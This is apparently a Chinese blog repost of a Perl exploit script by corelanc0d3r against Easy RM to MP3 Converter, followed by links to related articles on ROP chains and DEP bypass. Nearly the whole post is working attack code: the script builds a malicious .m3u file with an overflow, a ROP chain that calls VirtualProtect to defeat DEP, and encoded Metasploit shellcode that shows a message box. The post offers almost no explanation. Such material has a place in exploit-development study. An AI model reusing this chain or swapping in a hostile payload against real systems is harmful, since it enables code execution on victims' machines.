适合中文版本的Easy RM to MP3 Converter rop 过depexploit

最新推荐文章于 2021-03-18 22:55:14 发布
最新推荐文章于 2021-03-18 22:55:14 发布
阅读量896 收藏
点赞数
分类专栏: exploit 加密解密
#------------------------------------------------------------
#ROP based exploit for Easy RM to MP3 Converter
#written by corelanc0d3r - http://www.corelan.be
#------------------------------------------------------------
my $file= "rop.m3u";
my $buffersize = 26094-32;
my $junk = "Z" x $buffersize;
my $eip=pack('V',0x100102DC); #return to stack
my $junk2 = "AAAA"; #compensate
#------Put stack pointer in EDI & EAX------------------------#
my $rop=pack('V',0x5ADC9277);  #PUSH ESP, POP EDI
$rop = $rop.pack('V',0x77BEE842); #PUSH EDI, POP EAX
$rop=$rop."AAAA"; #compensate for POP EBP
#stack pointer is now in EAX & EDI, now jump over parameters
$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20
#-------Parameters for VirtualProtect()----------------------#
my $params=pack('V',0x7C801AD4);          #VirtualProtect()    
$params = $params."WWWW";   #return address (param1)     
$params = $params."XXXX";   #lpAddress      (param2)
$params = $params."YYYY";   #Size           (param3)    
$params = $params."ZZZZ";   #flNewProtect   (param4)
$params = $params.pack('V',0x10035005);  #writeable address   
$params=$params.("H" x 8);  #padding
# ADD ESP,20 + RET will land here
# change ESI so it points to correct location
# to write first parameter (return address)
my $rop2= pack('V',0x7633982F);  # XCHG ESI,EDI # DEC ECX # RETN 4
#-----Make eax point at shellcode--------------------------
$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP
$rop2=$rop2."AAAA"; #padding - compensate for RETN4 before
$rop2=$rop2."AAAA"; #padding
#----------------------------------------------------------
#return address is in EAX - write parameter 1
$rop2=$rop2.pack('V',0x77E64115);
$rop2=$rop2."AAAA"; #padding  
#EAX now contains stack pointer
#save it back to ESI first
$rop2=$rop2.pack('V',0x76A8131E);  # PUSH EAX # POP ESI # RETN
#-----Make eax point at shellcode (again)--------------------------
$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP
$rop2=$rop2."AAAA"; #padding
#increase ESI with 4
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
#and write lpAddress (param 2)
$rop2=$rop2.pack('V',0x77E64115);
$rop2=$rop2."AAAA"; #padding  

#save EAX in ESI again
$rop2=$rop2.pack('V',0x76A8131E);  # PUSH EAX # POP ESI # RETN
#create size - set EAX to 300 or so
$rop2=$rop2.pack('V',0x100307A9);  # XOR EAX,EAX # RETN
$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP
$rop2=$rop2."AAAA"; #padding
$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP
$rop2=$rop2."AAAA"; #padding
$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP
$rop2=$rop2."AAAA"; #padding
#write size, first set ESI to right place
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
#write (param 3)
$rop2=$rop2.pack('V',0x77E64115);
$rop2=$rop2."AAAA"; #padding  
#save EAX in ESI again
$rop2=$rop2.pack('V',0x76A8131E);  # PUSH EAX # POP ESI # RETN
#flNewProtect 0x40
$rop2=$rop2.pack('V',0x10010C77);   #XOR EAX,EAX
$rop2=$rop2.pack('V',0x1002DC41);   #ADD EAX,40 # POP EBP
$rop2=$rop2."AAAA"; #padding
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]
$rop2=$rop2.pack('V',0x77127D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]

#write (param4)
$rop2=$rop2.pack('V',0x77E64115);
$rop2=$rop2."AAAA"; #padding  
#Return to VirtualProtect()
#EAX points at VirtualProtect pointer (just before parameters)
#compensate for the 2 POP instructions
$rop2=$rop2.pack('V',0x76A812F1);  #SUB EAX,4 # RET
$rop2=$rop2.pack('V',0x76A812F1);  #SUB EAX,4 # RET
#change ESP & fly back
$rop2=$rop2.pack('V',0x73D55CA8);  #[Module : MFC42.DLL]
# PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN   



#
my $nops = "\x90" x 240;
#
# ./msfpayload windows/messagebox
#  TITLE=CORELAN TEXT="rop test by corelanc0d3r" R
# | ./msfencode -e x86/alpha_mixed -t perl
my $shellcode =
"\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51" .
"\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49" .
"\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46" .
"\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c" .
"\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45" .
"\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48" .
"\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47" .
"\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48" .
"\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47" .
"\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e" .
"\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49" .
"\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48" .
"\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49" .
"\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49" .
"\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e" .
"\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a" .
"\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42" .
"\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44" .
"\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e" .
"\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b" .
"\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51" .
"\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43" .
"\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50" .
"\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51" .
"\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50" .
"\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c" .
"\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48" .
"\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e" .
"\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b" .
"\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50" .
"\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e" .
"\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51" .
"\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50" .
"\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43" .
"\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43" .
"\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50" .
"\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48" .
"\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46" .
"\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e" .
"\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45" .
"\x5a\x41\x41";

my $rest = "C" x 300;
my $payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."n";
print "Shellcode size : ".length($shellcode)."n";
open($FILE,">$file");
print $FILE $payload;
close($FILE);
print "m3u File $file Created successfully\n";
sam20151111sam
关注
专栏目录
[网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8324
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
Easy RM to MP3 Converterv2.7.3(CVE-2009-1330)漏洞
06-20 511
软件名称:Easy RM to MP3 Converter 软件版本:2.7.3 漏洞模块:PM2MP3Converter.exe 操作系统:Windows 7\sp1\x86 漏洞编号:CVE-2009-1330 危害等级:中危 漏洞类型:缓冲区溢出 威胁类型:本地 1. 软件介绍 Easy RM to MP3 Converter为05-06年流行的支持常用音频格式文件MP3,...
VirtualProtect 2方法 -direct ret-dep-easy rm to mp3
weixin_30885111的博客
06-25 121
本次试验已经解决了 00字符的问题, 还有的问题在于用了很多的 系统DLL 试验在 XP SP3 下进行的~~~~ 例子软件:easy rm to mp3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~ ROP链 = 很多歌ROP小配件 ROP小配件 =每个指令 + ret 怎么找 ROP小配件: 1 直接找一些指令+r...
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
w4y2'blog
04-03 1934
软件链接:http://pan.baidu.com/s/1eQcLbpw 测试环境:xp sp3 看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。   运行程序,界面如图,下方为它的版本号。    
经典栈溢出 Easy RM to MP3 Converter
钞sir的博客
10-24 4310
以一个样本(Easy RM to MP3 Converter)将作为经典栈溢出的讲解实例,首先说明此实验是WIN10环境下复现的; “Easy RM 2 MP3 Converter”是一个音频格式的转换工具,年代比较久远了。在2009年7月17日,packetstormsecurity公开了该软件的一个栈溢出漏洞并提供了exploit:https://packetstormsecurity.co...
55.Windows漏洞利用之构建ROP链绕过DEP并获取Shell1
08-03
- Mona创建ROP链:利用Mona的工具和功能,找到适合的gadgets,构建能够绕过DEP并执行攻击代码的链。 八、编写漏洞利用脚本 使用Metasploit框架编写一个特别的模块,该模块可以自动化地构造和发送带有ROP链的恶意...
exrop:自动ROPChain生成
04-23
Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将...
ROP攻击实战:利用返回导向编程绕过DEP
它利用了堆栈中的返回指令,使攻击者能够绕过数据执行保护(DEP)机制并执行恶意代码。ROP攻击利用了程序中代码的重用性,在不需要代码注入的情况下实现对系统的控制。 ## 1.2 了解返回导向编程 返回导向编程...
Easy RM to MP3 Converter
08-24
Exploit编写系列教程1-10教程系列的参考软件,字数补丁补丁
AVI MPEG WMV RM to MP3 Converter(音频提取、格式转换绿色汉化版
03-19
软件名称:AVI MPEG WMV RM to MP3 Converter 软件版本:V1.6.6 适用平台:Windows 9x/ME/NT/2000/2003/XP 官方网站:http://www.alloksoft.com/ 功能简介: -----------------------------------------------------     AVI MPEG WMV RM to MP3 Converter是一个强大的音频转换工具,可以将所有的视频和音频文件转换成MP3, WAV, WMA和OGG格式,支持AVI, MPEG, RM/RMVB, WMV/ASF, MOV的视频和音频格式。对于想从视频文件中抓取音频和想把RM格式转换成MP3/WAV格式的人来说,非常有用。还支持分割音频流,内建一个小的播放器,你可以在预听的时候设置开始和结束时间。用户界面非常友好易用。
AVI MPEG WMV RM to MP3 Converter V1.4.8 汉化版
03-25
一款音频格式转换的工具,蛮好用的!
Easy RM to MP3 Converter漏洞分析报告
qq_32843153的博客
08-17 381
Easy RM to MP3 Converter漏洞分析报告   软件名称:PCManFTP 软件版本:2.0 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:NULL 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:本
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 437
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Easy RM to MP3 漏洞调试
xiaoeryu_的博客
03-18 339
0X00 前言 分析这个漏洞主要是为了学习怎么通过调试并编写溢出类型漏洞的EXP 0X01 分析环境 调试环境 版本 系统版本 XP_sp3 Easy RM to MP3 2.7.3.700 windbg 6.12 0X02 漏洞描述 这个漏洞是一个典型的溢出类型漏洞,在处理字符的时候没有对长度做限制,在读取到第25000~30000个字符的时候会导致返回地址被覆盖导致溢出 0X03 漏洞分析 编写perl脚本生成漏洞验证文件 my $file= "crash25000.m3u"
Easy RM to MP3 Converter栈溢出定位及漏洞利用
weixin_30374009的博客
08-19 284
  本文主要是Easy RM to MP3 Converter(MFC++编写)栈溢出的定位及windows下shellcode编写的一些心得。   用到的工具及漏洞程序下载地址https://github.com/5N1p3R0010/Easy-RM-to-MP3-Converter   首先,在填充字符为10000和20000时,异常被捕捉到 在填充字符为30000时,程序崩溃...
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 953
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
绕过DEP:Windows漏洞利用中的ROP链构建与实战
"这篇网络安全教程文章主要探讨了如何在Windows环境中构建ROP链来绕过DEP(数据执行保护)机制,并获取Shell。作者强调反对利用这些技术进行非法活动,旨在促进网络安全知识的学习和防御。文章内容包括理解DEP,构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值